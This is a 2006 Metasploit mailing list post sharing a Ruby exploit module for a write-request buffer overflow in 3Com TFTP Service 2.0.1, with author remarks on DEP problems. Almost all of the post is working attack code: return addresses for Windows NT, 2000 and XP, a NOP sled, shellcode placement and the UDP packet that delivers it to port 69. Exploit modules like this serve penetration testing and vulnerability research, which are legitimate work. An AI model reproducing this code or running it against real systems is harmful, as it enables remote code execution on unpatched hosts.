Metasploit mailing list archives

msf3 3Com TFTP exploit

From: grutz at jingojango.net (Kurt Grutzmacher)
Date: Thu, 30 Nov 2006 10:03:22 -0600
Doesn't look like SEH is being overwritten so I'm having trouble getting
this to work with DEP-enabled XPSP2 and 2K3. Tested on XPSP2 and Win2K. 
Includes offsets for NT, 2K and XP (call esi).

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

require 'msf/core'

module Msf

class Exploits::Windows::Tftp::ThreeCeeTftpSvc_Overflow < Msf::Exploit::Remote

        include Exploit::Remote::Udp

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => '3CTftpSvc Server 2.0.1 Long Requesat Buffer Overflow',
                        'Description'    => %q{
                                3Com TFTP Service version 2.0.1 suffers from a long type buffer
                                overflow during a write TFTP request. Does not require write access
                                to be enabled on the server.

                                Attacker controls ESI.

                                Liu Qixu of NCNIPC published this vulnerability.
                        },
                        'Author'         => 'grutz [at] jingojango.net',
                        'Version'        => '$$',
                        'References'     => 
                                [ 
                                        ['URL', 'http://support.3com.com/software/utilities_for_windows_32_bit.htm&apos;],
                                        ['BID', '21301'],
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'thread',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 440,
                                        'BadChars' => "\x00",
                                        'StackAdjustment' => -3500,
                                },
                        'Platform'       => 'win',
                        
                        'Targets'        =>
                                [
                                        ['Windows 2000 All SP English',   { 'Ret' => 0x750217ae } ], # call esi ws2help
                                        ['Windows XP SP2 English',        { 'Ret' => 0x71aa1b22 } ], # call esi ws2help
                                        ['Windows NT SP5/6 English',      { 'Ret' => 0x776a117e } ], # call esi ws2help
                                ],

                        'DefaultTarget'  => 0,
                        'Privileged'     => false,
                        'DisclosureDate' => 'Nov 27 2006'

                        ))

                        register_options(
                                [
                                                Opt::RPORT(69)
                                ], self)

        end

        def exploit
                connect_udp

                print_status("Trying target #{target.name}...")

                sploit = 
                        "\x00\x02" + 
                        Rex::Text.rand_text_english(1, payload_badchars) + 
                        "\x00" +
                        make_nops(473) +
                        [target.ret].pack('V') +
                        "\x00"
                        
        sploit[9, payload.encoded.length] = payload.encoded

                udp_sock.put(sploit)
                
                disconnect_udp          
        end

end
end


-- 
                 ..:[ grutz at jingojango dot net ]:..
     GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
        "There's just no amusing way to say, 'I have a CISSP'."
Current thread:

msf3 3Com TFTP exploit Kurt Grutzmacher (Nov 30)